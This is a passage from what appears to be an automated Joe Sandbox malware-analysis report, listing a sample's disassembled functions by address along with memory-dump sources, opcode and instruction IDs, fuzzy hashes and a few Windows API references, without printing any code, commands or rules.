                                                                                                                            • Opcode Fuzzy Hash: d1dd456d30c4c9e063a1937159eaa9418de9403de5e286d1490124b71d34f05f
                                                                                                                            • Instruction Fuzzy Hash: 7A41B432E442288FDB19CFE5CCD1BEDB7B2FB85314F15922ED506AB690D6746942CB80
                                                                                                                            Function 003B0CC0 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$P
                                                                                                                            • API String ID: 0-1080813287
                                                                                                                            • Opcode ID: 83d36623fe00e11d4c4af196a3436298b7ca19f0816b29787dcda342f2aa5a5a
                                                                                                                            • Instruction ID: 1d20fe0a109ed6a8b2dab82ab8f9311baf4349f3a11c88e39b8cde01f81cf2c7
                                                                                                                            • Opcode Fuzzy Hash: 83d36623fe00e11d4c4af196a3436298b7ca19f0816b29787dcda342f2aa5a5a
                                                                                                                            • Instruction Fuzzy Hash: 3F31C532A042288FDB19CEE4DCD1BEEB7B2FB81314F154219D506AB680D67869428B80
                                                                                                                            Function 00411B80 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: X>C
                                                                                                                            • API String ID: 0-872328525
                                                                                                                            • Opcode ID: a9b2c3ba3031ffee0b62830a26abfd6130e20520f53de3fee3baaef7cdc31a3c
                                                                                                                            • Instruction ID: c3536c3a1393b1149ada749e1c3c0169e858fcf798d8eeab66ce348d10dc4f2c
                                                                                                                            • Opcode Fuzzy Hash: a9b2c3ba3031ffee0b62830a26abfd6130e20520f53de3fee3baaef7cdc31a3c
                                                                                                                            • Instruction Fuzzy Hash: 07222671A093809FD374CF29C981B9BB7E6BFC9304F108A2EE58D97341EB7494458B96
                                                                                                                            Function 0041A670 Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ce8203878696ad9bcdcd485d4f1f9806f044fa2872d65ccf8dbbdcba2d473ee6
                                                                                                                            • Instruction ID: 900f55d2b6e7019eb52847469dc98e95b1ec5b1925bdb09c5afad1bca5ad793e
                                                                                                                            • Opcode Fuzzy Hash: ce8203878696ad9bcdcd485d4f1f9806f044fa2872d65ccf8dbbdcba2d473ee6
                                                                                                                            • Instruction Fuzzy Hash: 14A180749057648FDB21CB24C8907A6FBF1AF4A210F0981DAD89D6B352D734AEC5CF52
                                                                                                                            Function 004042E0 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ffce78058ac926cf06762bc4e4b34f88e04511ecfc5932482d2ba3c38903d9e8
                                                                                                                            • Instruction ID: 3ae2defec410cd5336062e1e84e1c45304c100c1f12228fb05a803271bea89f2
                                                                                                                            • Opcode Fuzzy Hash: ffce78058ac926cf06762bc4e4b34f88e04511ecfc5932482d2ba3c38903d9e8
                                                                                                                            • Instruction Fuzzy Hash: 3E617DB2E102299BCF04DEB9C8415AEB7B5EFC4760F15832AFD28B7280D77499408B94
                                                                                                                            Function 003B00DD Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: T;
                                                                                                                            • API String ID: 0-3742392016
                                                                                                                            • Opcode ID: 579dd89f5fd450efead43c3c5875c46775b66f5645cd8b2c137672e2d6772bb0
                                                                                                                            • Instruction ID: ca0934d56bf4c81895eef47e374fbc1da095972f9bc18505091418b2a9cca581
                                                                                                                            • Opcode Fuzzy Hash: 579dd89f5fd450efead43c3c5875c46775b66f5645cd8b2c137672e2d6772bb0
                                                                                                                            • Instruction Fuzzy Hash: 1C818B7AD107159BEB0E66B4CC5ABFF7A59FB81308F58963DA703EDCC2CA6845418281
                                                                                                                            Function 003B00D3 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: T;
                                                                                                                            • API String ID: 0-3742392016
                                                                                                                            • Opcode ID: 0058d2dac413dcac02bc14987f0dbc515c1ca542b2daaa243f3bc90d9c0dc804
                                                                                                                            • Instruction ID: 1ed0fb39b5973ecb5e7f5cc662ac9cf6dffbe6dd1eae4005d8516cfdd6512336
                                                                                                                            • Opcode Fuzzy Hash: 0058d2dac413dcac02bc14987f0dbc515c1ca542b2daaa243f3bc90d9c0dc804
                                                                                                                            • Instruction Fuzzy Hash: 5E717D76D106159BEB0EA674CC9ABFF7659FBC1308F28953DE703EDC82CE6805418281
                                                                                                                            Function 0042A9AE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 0042A9B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 22b9e1d720254fd6b4c4d0761b4a5d3f58e5ddf5931ca8531d83a89964cf516a
                                                                                                                            • Instruction ID: dbe11e59e199b027a4454e6b8806a57fd8da5023fa3fe12e4111a994b3c39e09
                                                                                                                            • Opcode Fuzzy Hash: 22b9e1d720254fd6b4c4d0761b4a5d3f58e5ddf5931ca8531d83a89964cf516a
                                                                                                                            • Instruction Fuzzy Hash: 339002A4751151478A0017716C5974565D05F4DF027D65861B501D4064DA654450951A
                                                                                                                            Function 003B0119 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: T;
                                                                                                                            • API String ID: 0-3742392016
                                                                                                                            • Opcode ID: 7b50f44adc4992377aa049be0ca992d437c2a07e5b5898e32b1aa02b1c467cb2
                                                                                                                            • Instruction ID: 089478707afcfbda5756d158ec0ac06eaaddc5c1ef8fec4474cf73771dfa603f
                                                                                                                            • Opcode Fuzzy Hash: 7b50f44adc4992377aa049be0ca992d437c2a07e5b5898e32b1aa02b1c467cb2
                                                                                                                            • Instruction Fuzzy Hash: 70619F76E106159AEB0E66B4CD6ABFF7659FBC0308F68953DA703EDDC2CE7846408240
                                                                                                                            Function 003B0131 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: T;
                                                                                                                            • API String ID: 0-3742392016
                                                                                                                            • Opcode ID: 16248f508bc273085903fde04ec3f666794eebb7ead07c272fad36a88516fafa
                                                                                                                            • Instruction ID: 46c47a410215759716044aab803c6897219912ae71255f98cf5fb62d539b42ea
                                                                                                                            • Opcode Fuzzy Hash: 16248f508bc273085903fde04ec3f666794eebb7ead07c272fad36a88516fafa
                                                                                                                            • Instruction Fuzzy Hash: B8616B7AE106159AEB0E66B4CC6ABFF6559FBC0708F28953DA703EDDC2CE6845414240
                                                                                                                            Function 0040C380 Relevance: 1.0, Instructions: 991COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4c889be30a311e16e48bee1b05670117ad6156acde2a4628853c4e8e0b481c85
                                                                                                                            • Instruction ID: 4333b9d0d5acb8f5accb26e14a5eaac9a82e291c7b81ab512bfe9320e1e3b833
                                                                                                                            • Opcode Fuzzy Hash: 4c889be30a311e16e48bee1b05670117ad6156acde2a4628853c4e8e0b481c85
                                                                                                                            • Instruction Fuzzy Hash: 98720BB2E102099FDB18CFA9C9916BEB7B6FB88314F19853EE415B3340E6785D418F58
                                                                                                                            Function 00422CA7 Relevance: .7, Instructions: 745COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b1ca8a2f46bb9531b024a4feadb45659753013cf57ea9bd0c50240ca34da5ef9
                                                                                                                            • Instruction ID: d058f5c2df756cc87c67534acfbb999737c3921beec795a61000d9fb105cbd8b
                                                                                                                            • Opcode Fuzzy Hash: b1ca8a2f46bb9531b024a4feadb45659753013cf57ea9bd0c50240ca34da5ef9
                                                                                                                            • Instruction Fuzzy Hash: 77620731C2016CBF9788EF6EACA507A3394E3C1321B42163BA499572F1D6B47974DB78
                                                                                                                            Function 00421B21 Relevance: .7, Instructions: 744COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1851d3b4a4738aadd24d692d5e393e640cee2a8eaff9e013f10b5a50f8276fa9
                                                                                                                            • Instruction ID: 3df70f10635f59ede4cac957d415010b2b13934184e723a482c447effc452343
                                                                                                                            • Opcode Fuzzy Hash: 1851d3b4a4738aadd24d692d5e393e640cee2a8eaff9e013f10b5a50f8276fa9
                                                                                                                            • Instruction Fuzzy Hash: 3A620135C1023DAFD784DB6AEC8502F33B6E380325B425232A599533B5E5787A74DB6C
                                                                                                                            Function 00417900 Relevance: .7, Instructions: 716COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cd019b8f0a0cd57988e193262d189295d51789da55d207afad85025949fece32
                                                                                                                            • Instruction ID: 7c8df773426e5b61dc3f75f8b9e5698c2a084f4f28f098d92f5ba66fa31f5705
                                                                                                                            • Opcode Fuzzy Hash: cd019b8f0a0cd57988e193262d189295d51789da55d207afad85025949fece32
                                                                                                                            • Instruction Fuzzy Hash: 77426C71A087518FC710CF29C48066BFBF1BFD8354F25892EE89597311EB78E9858B86
                                                                                                                            Function 004039B0 Relevance: .6, Instructions: 557COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ace049d863873799f0e6756e86da20426c64b4ec43a2bd477a1fb8ea22045fdf
                                                                                                                            • Instruction ID: 0c8905388a60c3f9b183c381661ea6ad8357e5722f2449756c29a998c2b2e050
                                                                                                                            • Opcode Fuzzy Hash: ace049d863873799f0e6756e86da20426c64b4ec43a2bd477a1fb8ea22045fdf
                                                                                                                            • Instruction Fuzzy Hash: 4132A6B1E002189FDB58CFA9D981AAEBBB5FF88310F14856EE809A7345D7349E41CF54
                                                                                                                            Function 0040DF50 Relevance: .5, Instructions: 480COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0fce3af0ef4f8a2620a75a6be6ffe8fd6aeea34f31a9b8ad56585650676a22bd
                                                                                                                            • Instruction ID: 6ddcb0a2d66f3eda1812c0cb20fb7eb47df3d717eb274793542b1713c925916b
                                                                                                                            • Opcode Fuzzy Hash: 0fce3af0ef4f8a2620a75a6be6ffe8fd6aeea34f31a9b8ad56585650676a22bd
                                                                                                                            • Instruction Fuzzy Hash: 5B0271B1900205DFDB14DF56C88066AB7F1BF48318F24897EE819AB382D779DC61CB99
                                                                                                                            Function 00422720 Relevance: .4, Instructions: 435COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a7cf2ebc6f9b604e2f6183a9631947a57249bfe8a176777597760a309b4c6aed
                                                                                                                            • Instruction ID: 79f22db35f6127dc0cb4272a0143880ba170ad86c7d23135de6853c94b71184b
                                                                                                                            • Opcode Fuzzy Hash: a7cf2ebc6f9b604e2f6183a9631947a57249bfe8a176777597760a309b4c6aed
                                                                                                                            • Instruction Fuzzy Hash: 7AF1B0B0A181B44AF75CCF2FACB017B3BE1D788302B51812FF896C7265C5785A5ADB64
                                                                                                                            Function 00404000 Relevance: .3, Instructions: 302COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 519107050a70720b9639daf6afae729268751c6b3d039c015e7cebac8e8768fe
                                                                                                                            • Instruction ID: a4adeed6831e382e91ad779d84db217321aa159c9dcb518f710bdd7232f07761
                                                                                                                            • Opcode Fuzzy Hash: 519107050a70720b9639daf6afae729268751c6b3d039c015e7cebac8e8768fe
                                                                                                                            • Instruction Fuzzy Hash: E4B10EF1E002199FDB18CFA6D9819BEB7F9FB88354B14853EE905E7341E678AD00CA54
                                                                                                                            Function 004238A5 Relevance: .3, Instructions: 268COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ff80e8e024e31dfcfb46ef2a89d988f2b282cfdb8e3c008ec88c8449fc1bfeb
                                                                                                                            • Instruction ID: db06df1e2be84d6b160c5086d70a1bc8f25c4fe4ba133cdc4ed487cebcda416f
                                                                                                                            • Opcode Fuzzy Hash: 2ff80e8e024e31dfcfb46ef2a89d988f2b282cfdb8e3c008ec88c8449fc1bfeb
                                                                                                                            • Instruction Fuzzy Hash: EEE1E0B44345A06A83ADDB2AF8F063A7BF4E749301316552EE0D6423B1C2B57AB0DF74
                                                                                                                            Function 003B1B6A Relevance: .2, Instructions: 174threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                              • Part of subcall function 003B1DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocExitThreadUserVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3328890273-0
                                                                                                                            • Opcode ID: 3b2840acd0ee49998e246ae7bc91642ffb7e0c442ffbe6e142dd33b2086d8ea7
                                                                                                                            • Instruction ID: 19e115ba588713465e0e885279f7fa364c1a65fdaab74d51573a02ecf6120263
                                                                                                                            • Opcode Fuzzy Hash: 3b2840acd0ee49998e246ae7bc91642ffb7e0c442ffbe6e142dd33b2086d8ea7
                                                                                                                            • Instruction Fuzzy Hash: 3E511B72E14728CFDB1ACE64CC907EDB776FB85308F5586AAC206A7A44D7705D458F80
                                                                                                                            Function 003B17FB Relevance: .1, Instructions: 144COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 72a1c57245790b9cd040bc3f56038c9b24094d50ea7a34fb3b3e483088bbd4a4
                                                                                                                            • Instruction ID: eb95acdf2c06504ee70abe3f696100a33387d8518b03dec9479b4996b08ecab2
                                                                                                                            • Opcode Fuzzy Hash: 72a1c57245790b9cd040bc3f56038c9b24094d50ea7a34fb3b3e483088bbd4a4
                                                                                                                            • Instruction Fuzzy Hash: D8516472D05229CFDB1ACFA5C8642EDF6B6BB84305F66C23AC509BBA54DB741941CB80
                                                                                                                            Function 003B1BE9 Relevance: .1, Instructions: 138COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 90ff7996fabbaf645633602c2d9acea9c6e39981eecf963e89e75974a32ced42
                                                                                                                            • Instruction ID: 16a93ee18f16d56be031de4c548e0f2ef68eaa917d167704787840def9423669
                                                                                                                            • Opcode Fuzzy Hash: 90ff7996fabbaf645633602c2d9acea9c6e39981eecf963e89e75974a32ced42
                                                                                                                            • Instruction Fuzzy Hash: 9A41F872E54328CFDB1ACE64CC907EDB776BB85308F5586A9C206A7A44D7706D458F40
                                                                                                                            Function 004127E0 Relevance: .1, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
